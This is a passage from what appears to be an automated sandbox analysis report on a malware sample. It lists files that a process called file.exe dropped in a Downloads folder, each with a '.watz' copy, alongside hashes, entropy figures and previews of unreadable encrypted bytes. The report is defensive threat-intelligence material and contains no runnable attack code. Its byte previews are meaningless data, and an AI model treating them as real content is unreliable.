]g~$45...^......sB6...KS.l^.G..[...Y....3...-.....Z...........0..Gf..Q.Gf..b...15...!.Wn.5..\|J0.\.g..+..............G.O.y;bo..>.]G..G.s...G@...m......C.p.8X...o~...4..O..\..X`...[T.fy1../...D#}.`..<.....6....t.bI....../.N....4..bv,.Fd......Pw....\|...?.8..o...Go.l...0....gP...Y....

C:\Users\user\Downloads\CURQNKVOIX.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8447982189098395
Encrypted:	false
SSDEEP:	24:HHfAjyKhk42bwVas/5R+ntH3QvJu0jfvSKaQgi9KrrKR5gqZppac9v7CMtkjbD:nYjD/2bwVj+ntH32JNyFi90r2g8acvO5
MD5:	392D565677C27B53F048E7C5AF194EDD
SHA1:	E28C9A900E73D407E0FE4E6817383E4C46E33882
SHA-256:	744B9F088CB93EC2968B8B1A995A4DE5CC29E74B0F2AD082A816AA3D27615A3F
SHA-512:	D0BED90E8A1CE7B7F4BE03BB55DA737F4E8BEEA59AEA96DEED01240AA5807AAE983431027573BE7C6BD2E47D2BD9A3E7E234F11E4FE32071E448755D878DE7EB
Malicious:	false
Preview:	CURQN'.ev.^.Y-N........ftJ>.3.k85a..J{..P..T.....n...l..#)5..8.!...._y..~X.6-Ux.........k.U...uZY6-.^}...I ......._p.B.?.........(~..j..ar.y..j.s......Y...TpU-...8.rqR......PFl,...f.......$d=...N...J=.e....2.E...9.Z..7)...}w+.v..uX ..O.<?.@.._..J..&[...>.......L-&.'.E..;.....WS&T.?)o.......zV5...8.. ...IKi#U......f)P..... [,....._.b.(6v.{.G.\|.V..,..pw....f....C7.m.8.56y.Gs...;....1.h...1..N.P..J...@S]>...hrj.O...P.....y.>`Umx.]...N"P.AQ.Vi..Y...t-_.a......)...t.PL.L 4......@[xw...w.W.....0...Esf....L...L.cG......`hm.......I..+.7.j.H..F<........W......P.+.n.x..;A..m...qQ@.@..IA...Eu.6.\...D>.S#.....(K.......t.+....s/.%..K..."..:.I.9._....Q...~...m;.a.S... ]g~$45...^......sB6...KS.l^.G..[...Y....3...-.....Z...........0..Gf..Q.Gf..b...15...!.Wn.5..\|J0.\.g..+..............G.O.y;bo..>.]G..G.s...G@...m......C.p.8X...o~...4..O..\..X`...[T.fy1../...D#}.`..<.....6....t.bI....../.N....4..bv,.Fd......Pw....\|...?.8..o...Go.l...0....gP...Y....

C:\Users\user\Downloads\DVWHKMNFNN.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854743327119682
Encrypted:	false
SSDEEP:	24:Fll4oRJE8xpvp8tIjH0bhdPX5bP1WiNIKmJrkCAJN05kgyCmgLHEf80F55AjNLTK:qoRW8zvnHMX9dXq/kCizg1mQHEf80F5H
MD5:	36F7B2B00CABA08C071BCB018259F99E
SHA1:	11D986EE03A101BF13DBA4C756968DD6B4D200E6
SHA-256:	B51971BAE58BF74494295542DA641EE92548EE13EE7CCCBBCD09590D8D65F620
SHA-512:	4FDFB0C5647EC20EC2789263404081F667AF87182E2166EA90CBAFC85E24851BBF00DE3D390AAE4124C5A5229E44ADEB70E0C6CA416948585BEAE184782AD704
Malicious:	false
Preview:	DVWHK.)%.C..Z. G.......~.9^..CR.9!.T.f....(.^T.x.$...gIG.o......"......{D-c...1c.$....\(.........>.I.}..s2.....8.l:..@...%..t..:=...(j...N........i.%.......C\?g/a.u..MoFN~.XF.NNdN...%F+...CN:q....c....<.`.<..i..J4?.z.."..\|."\|Q..X...M.w..xv}{.d?.1..=&.N.`mX..j.FB.@.....J.@.)Z<{jS..u...._.....4K0W.w...a...gH.D.:t..M.....m.... ._..n.6@.....k4..E...ye..H..g.<t..Z................!..-.6.8Oh..Cf#Vw..,9......Ru.P....a.h...U/....%.../x>.._Qq..er.V.E.4.0/..G.2....XWIy..]c..ze2p.P....y#o7..A......)....@.R..2.b......g.<.'...s...j...yk.[]..a...H..<.=Y.E....D...\|.k.."H..^.kM..........6.....CdO...D.6^..3+us...gIXW...~...j.BNs.&q.iG.4.q.c5......~Z.........P....9........T.QQ..\.!.......~e0.......} ..X.l."5m;.?.H.YR"...i...R&......z.cu.../.>.y..4.A......t.y.yI.Xy.S}3\Ut..oD(............[...(QH-.o..Z.j...<...P..G=<.L)..-..FA........H...Y.j<..%G..G..p.G...> .-.j."h.7r".*:.X.=.7.w.o..?G.z@f..$D..X..?\|9Ja....y.t.HZ.y...q..b..V..G...u#....Gn,...a.,,Z{.0....h..

C:\Users\user\Downloads\DVWHKMNFNN.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854743327119682
Encrypted:	false
SSDEEP:	24:Fll4oRJE8xpvp8tIjH0bhdPX5bP1WiNIKmJrkCAJN05kgyCmgLHEf80F55AjNLTK:qoRW8zvnHMX9dXq/kCizg1mQHEf80F5H
MD5:	36F7B2B00CABA08C071BCB018259F99E
SHA1:	11D986EE03A101BF13DBA4C756968DD6B4D200E6
SHA-256:	B51971BAE58BF74494295542DA641EE92548EE13EE7CCCBBCD09590D8D65F620
SHA-512:	4FDFB0C5647EC20EC2789263404081F667AF87182E2166EA90CBAFC85E24851BBF00DE3D390AAE4124C5A5229E44ADEB70E0C6CA416948585BEAE184782AD704
Malicious:	false
Preview:	DVWHK.)%.C..Z. G.......~.9^..CR.9!.T.f....(.^T.x.$...gIG.o......"......{D-c...1c.$....\(.........>.I.}..s2.....8.l:..@...%..t..:=...(j...N........i.%.......C\?g/a.u..MoFN~.XF.NNdN...%F+...CN:q....c....<.`.<..i..J4?.z.."..\|."\|Q..X...M.w..xv}{.d?.1..=&.N.`mX..j.FB.@.....J.@.)Z<{jS..u...._.....4K0W.w...a...gH.D.:t..M.....m.... ._..n.6@.....k4..E...ye..H..g.<t..Z................!..-.6.8Oh..Cf#Vw..,9......Ru.P....a.h...U/....%.../x>.._Qq..er.V.E.4.0/..G.2....XWIy..]c..ze2p.P....y#o7..A......)....@.R..2.b......g.<.'...s...j...yk.[]..a...H..<.=Y.E....D...\|.k.."H..^.kM..........6.....CdO...D.6^..3+us...gIXW...~...j.BNs.&q.iG.4.q.c5......~Z.........P....9........T.QQ..\.!.......~e0.......} ..X.l."5m;.?.H.YR"...i...R&......z.cu.../.>.y..4.A......t.y.yI.Xy.S}3\Ut..oD(............[...(QH-.o..Z.j...<...P..G=<.L)..-..FA........H...Y.j<..%G..G..p.G...> .-.j."h.7r".*:.X.=.7.w.o..?G.z@f..$D..X..?\|9Ja....y.t.HZ.y...q..b..V..G...u#....Gn,...a.,,Z{.0....h..

C:\Users\user\Downloads\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84648961661899
Encrypted:	false
SSDEEP:	24:np+ipShZofIPpnyN9JmGv7elExMWWyhT571vKbA8lSTE1+RebD:nQ5mfIcNA6/nwbAPT2+RcD
MD5:	4E2E4BD6321AFB3CF733FD9903BB2F7A
SHA1:	61830F570052476407C96177292D7247C8D1420D
SHA-256:	CF284C52448D92596E8E52D1D1E637A66A8FD61D8727F4381A94CDC768C6DE95
SHA-512:	3AC7C0E4E2CC53C870FA831C8D7AD65BE553AAD404C1B55AB223BF1FE8F9943497FCF3EA46B16A3B2C7C2EB2065428AC13492FFC073763D26B1F8AABA0A11D5C
Malicious:	false
Preview:	DVWHKT.S#.f............29..d+\|\p:.[D..~.hg.)e....e..k..aCw.Y...[z)0...@.H...=.....-!x..?...8........v.t5.:g..X....P......uy=....('..0.......0.F....:..k.n..T..C....0.J..b...H.<t`=.>....]......V...{..2.s.p....U..'{...y..Z.j.O......o.)Wo...G.7...W.(Cm$...II....T...C..C.....o.l.P..a.6.l}...+..H...Sw..A./k....Tz.[..d.....q.o.AZ....^.....~"..........pu.izP....l..j.....<.ys...g.....;.MLL.......G..y.1.].._...2...g......T.@.Db...n..d..w..\~....Y.lW.....{...X,.G.&.>5S..fD.&..d..O.K5...y..I.Z.^_eC.T.(v....%..(..].=......RZ..c..........]d ..e.o.,..Y.D..9,.......,UN......;0CdX.-.\|.f.y7..z....fN..\......j.!9/..2...=..b:.Q.K...+\.;G......F....\|&..'.c.H........Q.....d.]..C.....XT.>..9.. '.H_.."...M.jj..p.e....-....4"......AHV......g..#.yC..bW/k...S-...MraF...+T.u.R....H.3.P2...G...w....-s\|.....U.zIS..n.;..m...h..:..Hd..rb8.:b.@.....C...#..4MKm......X...7H,....E..:.G.F..=...gg.S..M0..O..e.q....T~..#@...2....Y.y..t.u.D).......^. *.%+~.pBz.2

C:\Users\user\Downloads\DVWHKMNFNN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84648961661899
Encrypted:	false
SSDEEP:	24:np+ipShZofIPpnyN9JmGv7elExMWWyhT571vKbA8lSTE1+RebD:nQ5mfIcNA6/nwbAPT2+RcD
MD5:	4E2E4BD6321AFB3CF733FD9903BB2F7A
SHA1:	61830F570052476407C96177292D7247C8D1420D
SHA-256:	CF284C52448D92596E8E52D1D1E637A66A8FD61D8727F4381A94CDC768C6DE95
SHA-512:	3AC7C0E4E2CC53C870FA831C8D7AD65BE553AAD404C1B55AB223BF1FE8F9943497FCF3EA46B16A3B2C7C2EB2065428AC13492FFC073763D26B1F8AABA0A11D5C
Malicious:	false
Preview:	DVWHKT.S#.f............29..d+\|\p:.[D..~.hg.)e....e..k..aCw.Y...[z)0...@.H...=.....-!x..?...8........v.t5.:g..X....P......uy=....('..0.......0.F....:..k.n..T..C....0.J..b...H.<t`=.>....]......V...{..2.s.p....U..'{...y..Z.j.O......o.)Wo...G.7...W.(Cm$...II....T...C..C.....o.l.P..a.6.l}...+..H...Sw..A./k....Tz.[..d.....q.o.AZ....^.....~"..........pu.izP....l..j.....<.ys...g.....;.MLL.......G..y.1.].._...2...g......T.@.Db...n..d..w..\~....Y.lW.....{...X,.G.&.>5S..fD.&..d..O.K5...y..I.Z.^_eC.T.(v....%..(..].=......RZ..c..........]d ..e.o.,..Y.D..9,.......,UN......;0CdX.-.\|.f.y7..z....fN..\......j.!9/..2...=..b:.Q.K...+\.;G......F....\|&..'.c.H........Q.....d.]..C.....XT.>..9.. '.H_.."...M.jj..p.e....-....4"......AHV......g..#.yC..bW/k...S-...MraF...+T.u.R....H.3.P2...G...w....-s\|.....U.zIS..n.;..m...h..:..Hd..rb8.:b.@.....C...#..4MKm......X...7H,....E..:.G.F..=...gg.S..M0..O..e.q....T~..#@...2....Y.y..t.u.D).......^. *.%+~.pBz.2

C:\Users\user\Downloads\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836480457178097
Encrypted:	false
SSDEEP:	24:t4TXN8OD+5s/jAhHeXuHb6UHExqUjhKDzJavn+cmOgEO1Si/e3kgfJkmObD:oXyImseeXEHFZXcMARgD
MD5:	C9E141E10F946CB1BDB5D0189185AC06
SHA1:	B3E33EE88A9B9D5E3A0B65F6204D91258C2C0A11
SHA-256:	FFEF45DD2475B3CF6B71DE4D86FBA25DF8AD440437B4C69AD42DF26B27389E10
SHA-512:	6261DBCB6864C66EBC27E678F02DE700F38C87FC800A33BD1542B767894305A06B49DECE5978CD444A1F3C1511A92AB39308DD99235940D6644A0F3189B5C703
Malicious:	false
Preview:	DVWHKOL..S..........Jo.Qg..j.j.^}..(.V..e.:...uB..g.....X\.j>.......m.i&....AX.L.....8k_.R.......-.vK...o...8.xY..(.....?.p2s<..YU.0...U.'.=g.1U.."..O......(..`.9,.}..$..we.......m.].H....#1.Sq0.~..8...T.dfm .n..#y$n...h.~.{...-......\............q+..b0Y.&..\|..?g..X_=.W.<./........,...::.er{o8.7...UTo."..._....g[...:..l...q.;.u..)#.....H..#9..A.jm..wh.3.P'...E...wj..[.+/.eaj.x...H9..S...H5.R..;.=.(Ec......-[....T.g..p.......8v....js/.....t`...1.;..w..F+.q..t.9j....u`..0D.2...2Pn...TR3......>H.~K...}...........p1.._..^.Td.........]..E.....`..#..G..u..9...8n...h.v...QZQp..g..y..1.@.8.a.g@l.Z..t.k.=T~'0X!.Wc..E?.c...F../2RE.P.3.......I.gV.vj.m..k8.~..s...O.27..)#..]..=.1[..mU..N...cE.R...[...`...b.oZQX..5.E.Z..../..<r..!D...+.W.2...5.x....4..F.f...Ma....Fk.l.!o......nCU.......i........6....A q+.9........+0.....o...@.2.........Q...=.._N.x...........i.C.'...e.5.Y...~._moPR.3,Y..#.!.h.j..u?...Y6...1..........)....L....z...7P:Z.8.z..I.

C:\Users\user\Downloads\DVWHKMNFNN.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836480457178097
Encrypted:	false
SSDEEP:	24:t4TXN8OD+5s/jAhHeXuHb6UHExqUjhKDzJavn+cmOgEO1Si/e3kgfJkmObD:oXyImseeXEHFZXcMARgD
MD5:	C9E141E10F946CB1BDB5D0189185AC06
SHA1:	B3E33EE88A9B9D5E3A0B65F6204D91258C2C0A11
SHA-256:	FFEF45DD2475B3CF6B71DE4D86FBA25DF8AD440437B4C69AD42DF26B27389E10
SHA-512:	6261DBCB6864C66EBC27E678F02DE700F38C87FC800A33BD1542B767894305A06B49DECE5978CD444A1F3C1511A92AB39308DD99235940D6644A0F3189B5C703
Malicious:	false
Preview:	DVWHKOL..S..........Jo.Qg..j.j.^}..(.V..e.:...uB..g.....X\.j>.......m.i&....AX.L.....8k_.R.......-.vK...o...8.xY..(.....?.p2s<..YU.0...U.'.=g.1U.."..O......(..`.9,.}..$..we.......m.].H....#1.Sq0.~..8...T.dfm .n..#y$n...h.~.{...-......\............q+..b0Y.&..\|..?g..X_=.W.<./........,...::.er{o8.7...UTo."..._....g[...:..l...q.;.u..)#.....H..#9..A.jm..wh.3.P'...E...wj..[.+/.eaj.x...H9..S...H5.R..;.=.(Ec......-[....T.g..p.......8v....js/.....t`...1.;..w..F+.q..t.9j....u`..0D.2...2Pn...TR3......>H.~K...}...........p1.._..^.Td.........]..E.....`..#..G..u..9...8n...h.v...QZQp..g..y..1.@.8.a.g@l.Z..t.k.=T~'0X!.Wc..E?.c...F../2RE.P.3.......I.gV.vj.m..k8.~..s...O.27..)#..]..=.1[..mU..N...cE.R...[...`...b.oZQX..5.E.Z..../..<r..!D...+.W.2...5.x....4..F.f...Ma....Fk.l.!o......nCU.......i........6....A q+.9........+0.....o...@.2.........Q...=.._N.x...........i.C.'...e.5.Y...~._moPR.3,Y..#.!.h.j..u?...Y6...1..........)....L....z...7P:Z.8.z..I.

C:\Users\user\Downloads\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844526302244161
Encrypted:	false
SSDEEP:	24:BllSnb7r1RSJkTaT6oO/74Wyw7IfAmjNxzBbAr/HnonwdEn2mRdbD:BPofr1R/TaT6kJwkYkHzBMbHonofQD
MD5:	585BF248E0CA2C2A267B3210697C9E5A
SHA1:	F5688F5A0E162765D37267ED94C0B1DD816C9DE4
SHA-256:	E42A4E900DDA5035ACCACE1B8C4B7DC7C944579218B5E2090BEFCA6D5800B2C6
SHA-512:	B661418E6AE1F6E68B70917062291947F25E6D8BC0F98B812A0E9140482BABB91BF105DC41A00F9BED7E7246C6B7C88ECEB7340B1F19B375B2703D7E305DAD21
Malicious:	false
Preview:	HTAGV....)..S.?..r..G.V}..^...V..'o..`_I...2R[.(.....\.....h.q.R...I..L.b....n...........j..qd.HX,.;+.-..p./.(.p....,..b.7.3...L...r.#GI.....4m.J3K.k.iA.~z!!..k#.s.(.7..+...~..V..r...u3...>...9........`.H.a#M._.....$&.S.&.2...I.nR?...3..."e.l...L.S...1v.H~u.d...._....1.~.....(O.......U..~.......G.MXH.Z@.>I\..+?..Z.M3J.KZ.......7..J"..4# ..`..9.[d.m....\,..o,..07.n......N.Q?m...M...P.7...\#~D..y.1.2....(F8B.V./.+...7...3......w..>.....%Eg")(.D .Ld.A.+=..#.......U.(...g.^J..p.o.&K....Y..!...SO2....2F{.....`]n.I.\%...d....o.....&E.\l#.c_Y.......g.4k0^f.y.....$!<..?Eu...w..To2.f.;1..........9N....@?F......+..eP....'/He...^X.4......a .)v..r..2.]P..r.3},.....<.0...........^......../J..E...c...j....V...aV..&.n.z,...:.K.!.5H./g(.K....I.s..*9...b."._..9{..`......S`..RW}.{q..5....'...G..:........e.......Z.v.4$d4..G.....".z..+A..,....='.... ...._"y....s.6.w..{.._......E.^..._ux....an..eKo...c.F..h=.....r.]..yK/%.)..c.R\m....\8..UoN..

C:\Users\user\Downloads\HTAGVDFUIE.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844526302244161
Encrypted:	false
SSDEEP:	24:BllSnb7r1RSJkTaT6oO/74Wyw7IfAmjNxzBbAr/HnonwdEn2mRdbD:BPofr1R/TaT6kJwkYkHzBMbHonofQD
MD5:	585BF248E0CA2C2A267B3210697C9E5A
SHA1:	F5688F5A0E162765D37267ED94C0B1DD816C9DE4
SHA-256:	E42A4E900DDA5035ACCACE1B8C4B7DC7C944579218B5E2090BEFCA6D5800B2C6
SHA-512:	B661418E6AE1F6E68B70917062291947F25E6D8BC0F98B812A0E9140482BABB91BF105DC41A00F9BED7E7246C6B7C88ECEB7340B1F19B375B2703D7E305DAD21
Malicious:	false
Preview:	HTAGV....)..S.?..r..G.V}..^...V..'o..`_I...2R[.(.....\.....h.q.R...I..L.b....n...........j..qd.HX,.;+.-..p./.(.p....,..b.7.3...L...r.#GI.....4m.J3K.k.iA.~z!!..k#.s.(.7..+...~..V..r...u3...>...9........`.H.a#M._.....$&.S.&.2...I.nR?...3..."e.l...L.S...1v.H~u.d...._....1.~.....(O.......U..~.......G.MXH.Z@.>I\..+?..Z.M3J.KZ.......7..J"..4# ..`..9.[d.m....\,..o,..07.n......N.Q?m...M...P.7...\#~D..y.1.2....(F8B.V./.+...7...3......w..>.....%Eg")(.D .Ld.A.+=..#.......U.(...g.^J..p.o.&K....Y..!...SO2....2F{.....`]n.I.\%...d....o.....&E.\l#.c_Y.......g.4k0^f.y.....$!<..?Eu...w..To2.f.;1..........9N....@?F......+..eP....'/He...^X.4......a .)v..r..2.]P..r.3},.....<.0...........^......../J..E...c...j....V...aV..&.n.z,...:.K.!.5H./g(.K....I.s..*9...b."._..9{..`......S`..RW}.{q..5....'...G..:........e.......Z.v.4$d4..G.....".z..+A..,....='.... ...._"y....s.6.w..{.._......E.^..._ux....an..eKo...c.F..h=.....r.]..yK/%.)..c.R\m....\8..UoN..

C:\Users\user\Downloads\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843717419154923
Encrypted:	false
SSDEEP:	24:oxNvUYYCeZTuaLyQMC/X+2vHJDXkIluFdGjpktK6DCQjwBFcJvQAKdcOO1sBFcwx:ozUYSi/gX+cpD0mcdOpktKeaFslKdO16
MD5:	69AD561E4FFE9619993C7530AB5045AD
SHA1:	0DBDD07189D31136A3B463051E3D4E5A8D473834
SHA-256:	BF88CA6F99E2E17C74EC34F8B1399957E4AA2C1FF871B0821FDE23FC6B229172
SHA-512:	E72A568AD236091ECC8CD5A51A61D22283E04E84638E7E7F385430B9A30B508FA87CF3BF8AE1F7A20F1A7C3ED1883C65B57A812D2A7E23387643F09A268CDCA3
Malicious:	false
Preview:	JSDNG.......N..:2..\|.h.....4aq.....L..?...d.....\|%Rh.s!Um.+.@..I......P...4rx=.r.....P....r.TQ...s.!k....e[...G........~.z.....C......b..D....s...."....<...9.E. W.....W..u.a.Z. ].....O....hC...y._}>`..[f.[....%..2S.C......W[...}.W.d.W.....hj.E.~.%..7."&r..+bJ....7.{q;.T.\|NI.>..5.Fm+.yQ..XOJt......kE......Q..P$...wZ......+N..p...)S;/. .s.dcpS...{..$..vu.Q......?......D(OE.....B.N.{.,..&=..Rs.+.r....B.{.....c....h$...R$.u9...MF...0q.2..\|`Q.jX/.Q.1..\..O.._.7T&v31...M.7...UN...p)...C...8...a8.....W.....=..R.s.r..,....4.6&Q;6...fp.....K..E3I7.X.5....wB.4//.~\.A..@.....o9..~.t....sA._.....j..G..#.g..N.TX..E.u..mV..!."...Q..^C!I.V.\...)(.,.KD.....4..s"....t....Ro})....v1..O..j2...~$....U^HK+..z(....g[.4.....^...o.B.F).4........XcVd..5=......G..].....2..v.:.Y.....W0.U....2.Z...z...g....Svp...z.zj.1.../.Tp..i...3.TT...<.B...h7.s(Z..h......Q.H.....5.[HD.1'..a.@.@..i.3.PgW...uQ...%..Y.....U\|..qi..Yk...05z..L..Q+.Ax@......./l2..6k\|...r...]);..

C:\Users\user\Downloads\JSDNGYCOWY.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843717419154923
Encrypted:	false
SSDEEP:	24:oxNvUYYCeZTuaLyQMC/X+2vHJDXkIluFdGjpktK6DCQjwBFcJvQAKdcOO1sBFcwx:ozUYSi/gX+cpD0mcdOpktKeaFslKdO16
MD5:	69AD561E4FFE9619993C7530AB5045AD
SHA1:	0DBDD07189D31136A3B463051E3D4E5A8D473834
SHA-256:	BF88CA6F99E2E17C74EC34F8B1399957E4AA2C1FF871B0821FDE23FC6B229172
SHA-512:	E72A568AD236091ECC8CD5A51A61D22283E04E84638E7E7F385430B9A30B508FA87CF3BF8AE1F7A20F1A7C3ED1883C65B57A812D2A7E23387643F09A268CDCA3
Malicious:	false
Preview:	JSDNG.......N..:2..\|.h.....4aq.....L..?...d.....\|%Rh.s!Um.+.@..I......P...4rx=.r.....P....r.TQ...s.!k....e[...G........~.z.....C......b..D....s...."....<...9.E. W.....W..u.a.Z. ].....O....hC...y._}>`..[f.[....%..2S.C......W[...}.W.d.W.....hj.E.~.%..7."&r..+bJ....7.{q;.T.\|NI.>..5.Fm+.yQ..XOJt......kE......Q..P$...wZ......+N..p...)S;/. .s.dcpS...{..$..vu.Q......?......D(OE.....B.N.{.,..&=..Rs.+.r....B.{.....c....h$...R$.u9...MF...0q.2..\|`Q.jX/.Q.1..\..O.._.7T&v31...M.7...UN...p)...C...8...a8.....W.....=..R.s.r..,....4.6&Q;6...fp.....K..E3I7.X.5....wB.4//.~\.A..@.....o9..~.t....sA._.....j..G..#.g..N.TX..E.u..mV..!."...Q..^C!I.V.\...)(.,.KD.....4..s"....t....Ro})....v1..O..j2...~$....U^HK+..z(....g[.4.....^...o.B.F).4........XcVd..5=......G..].....2..v.:.Y.....W0.U....2.Z...z...g....Svp...z.zj.1.../.Tp..i...3.TT...<.B...h7.s(Z..h......Q.H.....5.[HD.1'..a.@.@..i.3.PgW...uQ...%..Y.....U\|..qi..Yk...05z..L..Q+.Ax@......./l2..6k\|...r...]);..

C:\Users\user\Downloads\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857005175619595
Encrypted:	false
SSDEEP:	24:bQYjyOHB7QEXOBst8pg+6PeWwx1BhXdQ56ao/bmvmwJkJhEFl23VRbD:bQY6+7tElie3x11Qg/bwhGDEF43PD
MD5:	45AA3ED986E20CED27D167148B93FC28
SHA1:	1288BB0C26589C6D80F8D610C38D9400B350D821
SHA-256:	969982970B585D3731FFAED850C60691E4B51B765E8CA2DF3AA150B106E278A4
SHA-512:	DD10B85AFA4E0251AFA742AFF923698E6841915991A5B208452AB33C7EB9A0A8994FF8162A829014E50FA12B85E2C1262D51ADED6ECD1A3D86E9C99EADF74E9B
Malicious:	false
Preview:	JSDNGx...@.;...1.#v.s.8.A....Bk#O..p.#\|........!....b.>)..4.I..........F.M.... &.8......q..AI.70,..N.C....[.....5fc...y...\|.._.Q..g.!....C.Ky.U..+- ..P..B.\[i...]-W...[.i$...z.....BP=5.3xt(.E@#!........N.....L.Hys..;.....%.#j..@..Mm.2t..N..rzw.]..G..>.D4..E.x.UJ..}.....m....'@.~W$1...R}......W.o4. <.IWV@s.8..Y...>........8~Z.......j\|....yJES.K...'J...j........l..".6TN.Q.J.Bg(E.^.x..W.x#u#..LX..-....v.&9..$,..._.....4#.6.B-..[...p3....,=.u>4.....x)uX........~"..L.).2...w.c.y..{r.j.:...%..\^6.L.z.s.\Y.......tp.....+.p.?...\=1...!8.pF.y..Y'.......I..dJ....o...S.;K{..e.O.........S._..._.a..7<.._J.3.7.....e<.,.b.....Zy<..n.P"r..a.\....2."s..2h.....,`..pi...N...g.\.._$."F..d.7b'm..B9k.b....R.......b0........,....oI...Z.,l...K.9+.\|.m..7..Q.LrQ\....f.S ..).....0"/..`(.R..iF...\|..5"H........1~9:.].cqv...T..L..u......:.Q...[i..%F.T...r[....l.v.34n'..o}..g.,..\"...X..`<.a.z.Rw...1..U.,c..B.Rk..5...b..."x.,(g....=7..t.B..!i.K...:k..H......

C:\Users\user\Downloads\JSDNGYCOWY.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857005175619595
Encrypted:	false
SSDEEP:	24:bQYjyOHB7QEXOBst8pg+6PeWwx1BhXdQ56ao/bmvmwJkJhEFl23VRbD:bQY6+7tElie3x11Qg/bwhGDEF43PD
MD5:	45AA3ED986E20CED27D167148B93FC28
SHA1:	1288BB0C26589C6D80F8D610C38D9400B350D821
SHA-256:	969982970B585D3731FFAED850C60691E4B51B765E8CA2DF3AA150B106E278A4
SHA-512:	DD10B85AFA4E0251AFA742AFF923698E6841915991A5B208452AB33C7EB9A0A8994FF8162A829014E50FA12B85E2C1262D51ADED6ECD1A3D86E9C99EADF74E9B
Malicious:	false
Preview:	JSDNGx...@.;...1.#v.s.8.A....Bk#O..p.#\|........!....b.>)..4.I..........F.M.... &.8......q..AI.70,..N.C....[.....5fc...y...\|.._.Q..g.!....C.Ky.U..+- ..P..B.\[i...]-W...[.i$...z.....BP=5.3xt(.E@#!........N.....L.Hys..;.....%.#j..@..Mm.2t..N..rzw.]..G..>.D4..E.x.UJ..}.....m....'@.~W$1...R}......W.o4. <.IWV@s.8..Y...>........8~Z.......j\|....yJES.K...'J...j........l..".6TN.Q.J.Bg(E.^.x..W.x#u#..LX..-....v.&9..$,..._.....4#.6.B-..[...p3....,=.u>4.....x)uX........~"..L.).2...w.c.y..{r.j.:...%..\^6.L.z.s.\Y.......tp.....+.p.?...\=1...!8.pF.y..Y'.......I..dJ....o...S.;K{..e.O.........S._..._.a..7<.._J.3.7.....e<.,.b.....Zy<..n.P"r..a.\....2."s..2h.....,`..pi...N...g.\.._$."F..d.7b'm..B9k.b....R.......b0........,....oI...Z.,l...K.9+.\|.m..7..Q.LrQ\....f.S ..).....0"/..`(.R..iF...\|..5"H........1~9:.].cqv...T..L..u......:.Q...[i..%F.T...r[....l.v.34n'..o}..g.,..\"...X..`<.a.z.Rw...1..U.,c..B.Rk..5...b..."x.,(g....=7..t.B..!i.K...:k..H......

C:\Users\user\Downloads\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8179148665836555
Encrypted:	false
SSDEEP:	24:7angJxW5VLe9RiNFcJ3H5eUWZ1QseB67WEbS38zOTU1iR/lRGpsCp1KrGjbD:7BqVLwcFQ35eUWOB6rSszO7R/TGR7caD
MD5:	33291E6DE782761D7941E76F146111E7
SHA1:	A1892847AC01536639B5CC246EACAC486335D645
SHA-256:	5EE8A4E3DB6AF93E02402D6F193D991868FC2F22C5B718999E2409B01934E790
SHA-512:	169E897334FB7FC8F61CD18F7E43E2B3CE4B3EF984D7598A05B11740A7F3B8EF9D700756C357D4361CBB1830CC75F856BA3E45DFBC148A66D824F34CD696A4E3
Malicious:	false
